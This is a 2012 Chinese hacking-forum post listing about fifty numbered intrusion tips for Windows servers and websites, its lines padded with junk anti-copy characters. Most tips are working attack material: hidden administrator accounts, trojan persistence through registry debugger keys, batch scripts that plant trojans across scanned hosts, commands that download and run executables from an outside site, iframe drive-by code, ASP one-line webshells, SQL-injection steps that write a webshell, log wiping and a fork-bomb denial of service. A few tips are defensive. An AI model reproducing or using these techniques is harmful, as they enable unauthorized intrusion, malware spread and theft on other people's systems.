中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
7 I1 I7 X; k. x! ?. m* Ncacls C:\windows\system32 /G hqw20:R  z- N4 S7 J: [3 i
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入/ c, K& ]' w6 e: L
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F! u4 Z3 |8 s1 o( `1 N

" Y$ Z# L! L. X' P$ j4 Q2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
: O  N. O  F# X/ O$ j# g
) N' B' I. @0 j0 |. Q# g% u3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
- q  i" P0 Q' N) e4 C
) F/ V1 X3 z6 i; ^4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号) o8 `& |) S) H6 ~+ u* [5 W
0 c5 G5 a' N$ u* J7 N  ~
5、利用INF文件来修改注册表: b; g( r7 B  w6 x) i' W
[Version]5 U$ N( P- T- g6 e1 X7 N/ p8 Y
Signature="$CHICAGO$"
6 h! X  t4 i6 H! m  _[Defaultinstall]
" Q& c  \1 j; D0 r6 |addREG=Ating& P' m- R4 o. C1 Y
[Ating]
/ ^0 w7 |6 ?$ ]0 HHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"& L' q; w2 B: V
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:7 p) O: w1 z) N5 `7 B6 d
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
; b- ]* [& p2 c. c4 A! ~2 b其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, G; s/ J; S& r5 F* v
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU9 g3 c+ v& ]# O* ~# O; f1 n. }5 d, E
HKEY_CURRENT_CONFIG 简写为 HKCC- k& H0 i! f9 T! Y: r) \
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
4 z( ^: i9 C9 i& K; L. C7 X"1"这里代表是写入或删除注册表键值中的具体数据3 c$ h3 r3 P) ~; F# @
2 q# `$ G1 B. P& N: P
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,  {4 W% M2 S0 I( L/ |3 j
多了一步就是在防火墙里添加个端口,然后导出其键值/ ?1 t" ~; O  l2 E1 j) N5 N
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
& i6 D1 A; B5 s, [' _5 D& J! X, d3 Y* n9 L4 d& Z
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽) {( z! v/ Y% m% R. e' O
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
2 c( \7 e. G. o. C, }
5 U  _# q2 ~6 [. g: {) j$ Q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。- r0 b! P" u* o  J1 R6 n; E8 `

4 \7 J) ?0 w/ G9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,3 J  t7 w: p4 I* M9 t! h/ m4 E8 {& g
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ H- N) D& D9 ?, h" P9 v' O

" J+ f& |" H* a9 O; O10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”9 R" Q, F3 H+ M" G$ H9 n. I, X
% V; I  l) k3 W- ?  }
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) Q, o% P! |( |. s用法:xsniff –pass –hide –log pass.txt- L9 S* W9 t; ?: B; @0 I

0 i% D* c/ v( P7 v- D- H12、google搜索的艺术5 S/ C& c$ a4 q
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 d' b4 Z, w5 w* P7 H& ~或“字符串的语法错误”可以找到很多sql注入漏洞。3 P( t# o: R# ]7 [9 e9 l( d: P
% u# X* ]* F3 [: m8 X  U
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。6 G0 [2 C7 X6 J+ k: m8 j

9 ?9 X, P4 W5 b2 P% B! R14、cmd中输入 nc –vv –l –p 1987* T# u4 l7 @" n
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
; `: @( |3 J$ X" [; W* j  B: k& |: ~! N5 v. _( a' ?6 D7 x* [
15、制作T++木马,先写个ating.hta文件,内容为! Q7 l1 R' I0 f1 n. {& _. f+ ~* b
<script language="VBScript">
2 V5 w; r4 ~$ B6 Y% p3 W, bset wshshell=createobject ("wscript.shell" )
' J* }& G- `: W- |+ }; O* j* ua=wshshell.run("你马的名称",1)
7 @5 B- R; K1 Y2 _$ O: b% twindow.close% N+ C. g5 h) `$ ]8 a  |- W
</script>: M: ]0 l% `6 O3 D" ~6 z% Y+ I9 F+ j
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
1 c7 `) [( F7 q4 C- u3 ]! @' n' D5 H
16、搜索栏里输入
5 h( D/ S' f8 \! A/ W2 l+ c关键字%'and 1=1 and '%'='
! R% M" N% M- p6 Q9 v" ]' Y关键字%'and 1=2 and '%'='
" s1 X% H" {0 ]& t4 X/ q, V, ^比较不同处 可以作为注入的特征字符
! O4 _  X0 _" b7 o+ Q2 n% y* V( z) a) y' w# G
17、挂马代码<html>5 W4 ?: k9 ?2 o' K
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; S1 G7 B  W- U: n9 B</html>
+ i: A( l4 h- k1 i- j9 b
  j; o) V: {  c0 \- E3 \18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,: N6 P  Q; ~3 b4 k$ U  i
net localgroup administrators还是可以看出Guest是管理员来。
4 Q, b( I/ t, R4 P! b" o: }
2 n. I' M4 e4 {$ W/ b% [2 ~% A19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
  \* [/ q! X0 Z9 L" b; D& j用法: 安装: instsrv.exe 服务名称 路径
' k% e* U" S5 `! ?6 w( D3 f卸载: instsrv.exe 服务名称 REMOVE4 T; r, t$ U$ v2 t) S" T5 k

$ h; T- E5 V* _4 S
% |7 ]/ P, `& g( ?21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
/ s& t# L$ Y2 E: x7 P3 Q' }  X不能注入时要第一时间想到%5c暴库。5 _+ d: o/ Z4 D* r, ~
% f! V6 z  [& O, o) W
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
$ s+ D1 n+ L+ k7 ]  M, T& t' H- O: S' H1 }5 D3 C" h5 i
23、缺少xp_cmdshell时
  e8 f& {9 i% A& |尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, ]% Z7 G- m& X- p假如恢复不成功,可以尝试直接加用户(针对开3389的)
' {+ w" V  f; Q' ndeclare @o int% ]6 c5 c/ j$ o* C. n: n$ p* T+ |
exec sp_oacreate 'wscript.shell',@o out
" K- j$ e" Q) w4 ?/ L6 f: Y4 ^exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员  y5 q  \8 o, J! o: n; v" y3 W

1 }) X! [8 ]: V& f( I24.批量种植木马.bat
: Q/ K: b" [# ^2 v) \: L, `2 x/ dfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
/ G5 {% g. a7 r$ d! u* Y! ifor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间) }3 z% `( Q3 s  h# i
扫描地址.txt里每个主机名一行 用\\开头, ^8 k9 c+ r0 O; b" F! Q- a

3 F( R( ?* b4 W  g$ F. R: Z$ U25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
. N5 t7 K/ x" i+ ~. _" Z& F. [5 b# E1 j
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.$ W+ Z* g. v; i3 ?6 L
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.5 I5 ]. H/ `+ |* V8 W8 q, n% D
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马3 J& S. n3 x2 R) B1 M

. q- d+ q" U+ l: ^. x27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
" {# M2 C+ ]) }* |然后用#clear logg和#clear line vty *删除日志6 s7 u1 r+ E$ L3 _

. x0 ?. E$ \, V3 v9 A0 I28、电脑坏了省去重新安装系统的方法
# W+ Y+ n2 O' k, _7 |; z9 a- V9 H3 M纯dos下执行,$ P1 S* d7 j* ^4 n# i: K
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
5 O1 [$ s) c7 b* _5 o. s0 V8 I2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config3 J7 D4 j6 ^5 \3 P4 U

+ \( \3 [) s/ D# G9 a% c3 W29、解决TCP/IP筛选 在注册表里有三处,分别是:: l7 b, f3 t. l% p5 \0 ]& h
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
3 @% \& D5 \+ s* F8 L  HHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, T. z1 V+ W8 Q$ e/ A. _: p, IHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( O( \5 b! j$ {( I& I2 m0 f分别用
: d: r! t; f8 `4 q0 qregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 [( s' `6 I) v  T9 e
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( M8 m: }# q* S$ o+ a4 j$ O
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# V5 F+ J- N( y5 I, o7 N
命令来导出注册表项) \7 p3 w+ P/ z; v% B  c0 ?
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
3 w' b$ S7 y2 v- x5 f( c# \+ z改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用' r& l1 Z( A6 \9 _$ V
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。; I6 i& D  ~0 G2 A6 `# Q! d5 b

/ M; D- M; C5 [) {+ j" ~" f0 t30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U: e; o: V8 S; \: z% |+ a2 n
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的35 f* b# n% g, I
# u2 c0 I/ o" B; l
31、全手工打造开3389工具
" r7 r# w- d# P7 R9 [$ b4 ]2 ~, S% X打开记事本,编辑内容如下:6 w1 _# H; ~, E: K  s9 ?
echo [Components] > c:\sql
% c, t  m% L- N0 Eecho TSEnable = on >> c:\sql8 `" q+ Y; {! H+ w6 n  S
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
- u7 Y0 y" ]1 Q+ i编辑好后存为BAT文件,上传至肉鸡,执行: f3 H& G) g+ C6 a" [, f6 b2 ^
  c7 z4 U$ Q' y3 I! |
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马: @% f- A$ N5 T+ m% N
- l6 ^) a0 y; ~+ v" p$ L/ a4 D
33、让服务器重启
+ f) G5 \- U! o. ?* L写个bat死循环:# D7 N# b3 I/ P$ T, e* q0 l2 |
@echo off
0 X9 C" `# S8 ^% K0 e:loop18 A: W; M1 H7 z+ t4 ~/ [. b
cls' Q1 }. o; M" s$ [% D
start cmd.exe3 d: N/ f/ x" Q6 b
goto loop1
' C7 f, A1 m6 v; T# v9 j* T保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
0 a' H4 b) ~8 r+ I
0 w% E" f$ W2 k9 o, c1 n5 h$ }34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
9 g! S  K: A1 Q" F@echo off' l& z/ V! a. B1 H" }
date /t >c:/3389.txt
1 R4 l# R3 }  P  ]! I" W) gtime /t >>c:/3389.txt
% x) G6 x5 D! \7 @' O# ~6 Battrib +s +h c:/3389.bat: T: n6 e: l. g
attrib +s +h c:/3389.txt8 L% o0 p9 I: n7 {( j$ L
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
+ x+ w: e  j9 E; m- K  N9 i并保存为3389.bat
: ]' D/ h0 H4 m# l& d打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号6 e, o5 ?) H# b9 {& ^) s

* X$ t% x& C" ]6 q, G; p35、有时候提不了权限的话,试试这个命令,在命令行里输入:9 R7 c$ ]: \, G  Z! T6 ?0 h$ M
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)/ O( ^; x/ I, ~% y9 [7 E3 i
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
; S4 W  p* N! H8 J( t; \, S) U/ F' c" ~% Y3 Q  ?
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件' m6 W8 W0 x( Z" v, f
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址2 ?5 `8 q3 I$ B& f, Q
echo 你的FTP账号 >>c:\1.bat //输入账号) a* p% X( e) w/ A7 _+ k
echo 你的FTP密码 >>c:\1.bat //输入密码7 t0 k8 {- a# P+ X: T1 q2 u
echo bin >>c:\1.bat //登入
8 ?" c2 `  j# |6 s0 Lecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么8 B- R3 M) P7 j. L1 Y% C2 c
echo bye >>c:\1.bat //退出
* T- s2 I) F1 T4 v+ s, c5 ~& T然后执行ftp -s:c:\1.bat即可# N# w& U# ^$ S" G

& S) z' {& k1 {9 S37、修改注册表开3389两法
$ }& z* v' _8 m4 j( F% @" o% a% P(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
' H2 T0 [, [+ u; Kecho Windows Registry Editor Version 5.00 >>3389.reg
" _" {( k- \5 K5 Aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg+ k1 A2 t- k/ P8 h
echo "Enabled"="0" >>3389.reg
' S  ~+ [) X) q; Y7 R7 h. r* o  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
7 e' u- A+ b. a! Y; JNT\CurrentVersion\Winlogon] >>3389.reg
' O: v$ J* ]. X- Z% ~echo "ShutdownWithoutLogon"="0" >>3389.reg
. b. [1 L" Z3 o4 I1 u: m* iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]0 C5 \; g/ [/ I5 H# V, O
>>3389.reg
8 E8 R2 }, s9 {; Lecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 r. A( ^  I" ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
- K) i  I: b" r' {>>3389.reg- s4 O. o% }0 a/ j6 T* }
echo "TSEnabled"=dword:00000001 >>3389.reg
0 f4 \) G' N; g+ techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
8 ]7 v1 j8 b8 P. ^1 v4 e7 Cecho "Start"=dword:00000002 >>3389.reg5 G/ W. O9 G0 w+ l; h- d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]7 d2 t  \, L+ u7 @- @+ U5 Q
>>3389.reg5 h& C" V; D: C1 p2 e% a' ^! ?
echo "Start"=dword:00000002 >>3389.reg
" a8 u, b  E0 _3 b0 ^echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg7 k3 S1 Q. [7 ^7 ^
echo "Hotkey"="1" >>3389.reg
# y: A; a5 q4 [0 M( H: h+ jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# T8 A4 k3 x0 Y- j5 v. M* @
Server\Wds\rdpwd\Tds\tcp] >>3389.reg- t6 o: h- J7 Q! E) L& E4 b5 Y
echo "PortNumber"=dword:00000D3D >>3389.reg
  @" P5 j6 n  W, w2 p! yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 r2 a+ K5 f; Y7 H* [1 i7 t, gServer\WinStations\RDP-Tcp] >>3389.reg
, D0 c# k2 P, o+ Necho "PortNumber"=dword:00000D3D >>3389.reg
! i4 G. t' a1 J, @: f& A9 _7 U5 K$ T把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。. c( J( C! S1 L! {0 Y3 N
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
" N. S2 I) o3 ]. k8 P9 z因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
0 e6 S( `0 I8 i+ E4 c9 v7 Z( E1 I(2)winxp和win2003终端开启
2 p) A- R% m2 W9 b2 g0 f用以下ECHO代码写一个REG文件:
2 F% [$ M' R. k  W& h! Z& Z! pecho Windows Registry Editor Version 5.00>>3389.reg" {5 K4 ?7 o& b& W, X8 C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 i1 w. E! }2 pServer]>>3389.reg" A3 N5 X! g: b8 M* w
echo "fDenyTSConnections"=dword:00000000>>3389.reg9 |4 ~0 c& E( \. X8 G2 `: x+ k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( l) `  x# W( z
Server\Wds\rdpwd\Tds\tcp]>>3389.reg9 \$ k1 ~" I+ ^. ]( h1 k8 g
echo "PortNumber"=dword:00000d3d>>3389.reg$ f) j+ n" G5 [6 t. C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; s0 o8 Y# a: F) L. d6 _1 h4 M
Server\WinStations\RDP-Tcp]>>3389.reg
2 |- ?( `% v: a! G. E) ~echo "PortNumber"=dword:00000d3d>>3389.reg
2 r' n, U1 q0 V$ S6 B  B然后regedit /s 3389.reg del 3389.reg
2 Z0 }) c5 }. R8 a3 T- o2 d7 IXP下不论开终端还是改终端端口都不需重启* m$ s$ D: z, x3 a  D
2 o  H+ \& B3 C  S3 S  x: F/ l
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃4 G( A1 r& i; A# U- D; }
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'9 h7 A; w1 b! }6 b) @, R1 V4 @

" A9 d1 `: e4 a/ @; r39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!  z3 ^2 u' X1 O$ j0 _1 K
(1)数据库文件名应复杂并要有特殊字符
( O0 A0 V/ d  [& K(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
) t7 U+ s8 e% v( x  a# p将conn.asp文档中的" ^2 V( a  H& d. k
DBPath = Server.MapPath("数据库.mdb")5 Z3 ?4 p! L2 e; P9 K
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath3 I# \( q) e& ]- B

6 X+ e: C4 g7 v) X: O修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
  T6 `$ ^- U: y, P9 e- q(3)不放在WEB目录里8 V; d& ]+ A- t7 ?0 w
: x. K7 T/ w7 U5 w- w
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉6 k/ i, R% S, b" q) t0 L7 n+ m- n0 ^, E
可以写两个bat文件: U! R6 c+ c# s0 [
@echo off
8 W  u) ^. G4 U% U& N@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe6 W: A8 E; N3 y5 e) `6 q
@del c:\winnt\system32\query.exe
6 z" Z. c% B4 d! e7 }! c) ?% w& C@del %SYSTEMROOT%\system32\dllcache\query.exe. g" h! J+ i2 n0 _, `
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的+ h0 z$ ]0 _: X
9 p1 E3 G4 X# S
@echo off. _1 c  N  W6 }0 S1 \
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 o- _+ M& V0 w# v- r: @
@del c:\winnt\system32\tsadmin.exe
# M- G# s: u% l  Q! H+ g" D. P@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex6 L  j* E4 V( ~( L- O) A- F
7 A& Y3 o% R7 j
41、映射对方盘符" o+ c  P7 c  Y6 m$ d  C9 j1 K
telnet到他的机器上,) p5 }! [* r" x9 z
net share 查看有没有默认共享 如果没有,那么就接着运行
0 P# h# Z- f5 g/ q1 ?% ynet share c$=c:
, l# A; @$ K6 d( Z( h/ d; g) jnet share现在有c$
( M# F9 T' l3 C' v  q在自己的机器上运行
5 T; E$ T) A; z4 h9 c+ K! |; V. wnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K" ~! V4 z# `- |  b
4 R- U+ \8 c) i
42、一些很有用的老知识
  t+ e: R: D4 `type c:\boot.ini ( 查看系统版本 ). z; e6 ?. ~8 Q& D: V
net start (查看已经启动的服务)7 i+ O( y# J# }, s& K" c! K- I
query user ( 查看当前终端连接 )1 h5 ]& ?# |# F/ k
net user ( 查看当前用户 )
! }5 j4 a& k1 X0 C* w% Tnet user 用户 密码/add ( 建立账号 )
- K( O- r5 d5 p# `( A- U- Gnet localgroup administrators 用户 /add (提升某用户为管理员)/ j5 Z" d+ f- C- X  |, W
ipconfig -all ( 查看IP什么的 ), o& w$ g2 ?4 _
netstat -an ( 查看当前网络状态 )* r# a& Y* I; E7 o* x+ n+ `
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
' O0 g8 a6 f9 f( U4 y5 V& |3 _" r克隆时Administrator对应1F45 Q- @3 U9 O5 E
guest对应1F5
4 }" i* Q! Y: }% Q% p* `tsinternetuser对应3E86 o' Q) f! i  _# N1 r
) u" D8 E3 R( F9 B; ?
43、如果对方没开3389,但是装了Remote Administrator Service$ L3 w; |0 J; L+ `$ c
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
6 z0 ?, ~# R7 m/ S+ I) K# _解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
, ~& ?3 _% r" P5 x1 k/ x1 k先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"2 ?5 m2 E: e( _: r2 G: e' g6 |' C

& l, ^& Q4 O! T8 Z44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; H) A2 u' j8 `* ]0 r本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
, I) B+ x9 {0 ~% r- _& a/ ]+ u3 F3 d  i9 M- J
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)( p  `0 t1 a* z4 Z2 t
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open' m2 D. M; V8 ?8 p9 M6 c
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
- @8 _5 p: ]6 A4 `0 |# P; h8 p) [# tCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
  T, E. q" D* K% S& Y* L6 V; F1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
1 g2 A$ T1 x, m" q8 R, o(这是完整的一句话,其中没有换行符)& q  Y9 T5 S+ N4 R( U
然后下载:9 Q9 z+ a* A6 \* e5 e& t
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
! d; a2 j% R" S1 ]( j8 [
( ^7 f3 Z7 I8 J5 `) D46、一句话木马成功依赖于两个条件:
* S. Q! h4 K3 ~7 R1、服务端没有禁止adodb.Stream或FSO组件! B0 ?6 }4 ^: q9 J& n5 ?
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
& U# O! \: q' L  d
) b' E% z- k9 P  l! ]4 W0 ]47、利用DB_OWNER权限进行手工备份一句话木马的代码:
+ x% }4 |& b! B/ G* C: |- Y- v;alter database utsz set RECOVERY FULL--9 ]5 [- A/ ~: ^0 F: n3 z  r
;create table cmd (a image)--
/ |/ |8 _% p0 w! w1 m( ]! ~0 ?2 c* r;backup log utsz to disk = 'D:\cmd' with init--/ i2 L$ N- ^- E- a
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
/ G! `; w3 F# _( z! |: q+ w0 `$ D;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
" x" I: _- j* ]+ i注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
& N5 F1 C' R. D, l+ n+ Z% f3 w7 `( F! S+ I
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% u3 s% a& j6 N1 f- t
5 h* e% z( a% s  w, J0 Y用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options- Z" W% G$ w0 ]0 g( ?" U6 e: d6 ?
所有会话用 'all'。
" s! ]0 ~6 O6 T5 Y1 }* u-s sessionid 列出会话的信息。
9 z, D8 ~* b/ l/ Q2 A  ~4 P-k sessionid 终止会话。; K# N2 y7 T5 C6 z+ w$ x
-m sessionid 发送消息到会话。
' I! \' Z, m# }8 o8 I- c" }, k( C/ F; d; r6 {
config 配置 telnet 服务器参数。. I! C0 t; Q8 U' W0 Y1 I
- @# W, `% @- E8 e" o5 x7 E( v' v
common_options 为:* d/ A+ K7 P5 i' B  W+ G9 `/ Z3 Z
-u user 指定要使用其凭据的用户
+ o: H) N6 D# U/ q-p password 用户密码
1 q8 d; T' x' @% F7 D1 J  C  t9 W9 L  g- M" R, ~4 p% C! f
config_options 为:
0 B5 B  _% l: F9 |7 N: x' @dom = domain 设定用户的默认域
- T% g/ N0 \+ C5 @) G9 ]( R, ~ctrlakeymap = yes|no 设定 ALT 键的映射
' s- S8 h- {$ j0 R( Ptimeout = hh:mm:ss 设定空闲会话超时值
+ s. i( }% l% ]timeoutactive = yes|no 启用空闲会话。3 K2 |8 Q; Y) M+ k
maxfail = attempts 设定断开前失败的登录企图数。- {2 L0 x' G6 Q" x+ [4 @
maxconn = connections 设定最大连接数。
7 G: D" I# T% R, pport = number 设定 telnet 端口。; d# l' ?* ^: V# `0 E; Y
sec = [+/-]NTLM [+/-]passwd
% p  R& C" H8 o) O" m设定身份验证机构7 _- h3 {, f, u4 j. L
fname = file 指定审计文件名。! p( O  C' q) ^3 j5 e
fsize = size 指定审计文件的最大尺寸(MB)。
4 I! X# P  p1 C  p( G! T8 L( n' p3 gmode = console|stream 指定操作模式。4 g2 q" T/ S0 s  k! S% U3 O% _2 L
auditlocation = eventlog|file|both5 O, T* X% b' s$ z: u7 e
指定记录地点& Y3 @6 {- q  k1 Y" }/ D6 l
audit = [+/-]user [+/-]fail [+/-]admin( u2 n9 {+ Z& J$ x
# y* L5 U- f$ P7 U
49、例如:在IE上访问:
/ V! r& Q5 g6 Rwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
# Q% L# V. G% ahack.txt里面的代码是:/ T. m# v- S3 D0 o; D
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
/ g  y! ]* Y( b9 ^( Y9 K0 {/ R9 _把这个hack.txt发到你空间就可以了!4 d; q' L8 e8 j' r* }+ ]2 g4 |
这个可以利用来做网马哦!$ I/ ]+ J/ b4 ]0 h6 L$ ~! k

/ _& d0 h5 j3 P5 m' {50、autorun的病毒可以通过手动限制!9 N7 C) @' {4 o% m
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!* b- @# }% z/ L& A) ~3 r
2,打开盘符用右键打开!切忌双击盘符~
- J3 g" v2 ]; U/ M2 G3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
1 V# v9 }. I& v2 k, {/ w( r& u. \# ?5 R
51、log备份时的一句话木马:! A+ D) U/ b5 d( b
a).<%%25Execute(request("go"))%%25>3 M! T5 y3 L7 k. y
b).<%Execute(request("go"))%>
1 i2 \% @. k& b9 C7 T  A" m; `c).%><%execute request("go")%><%
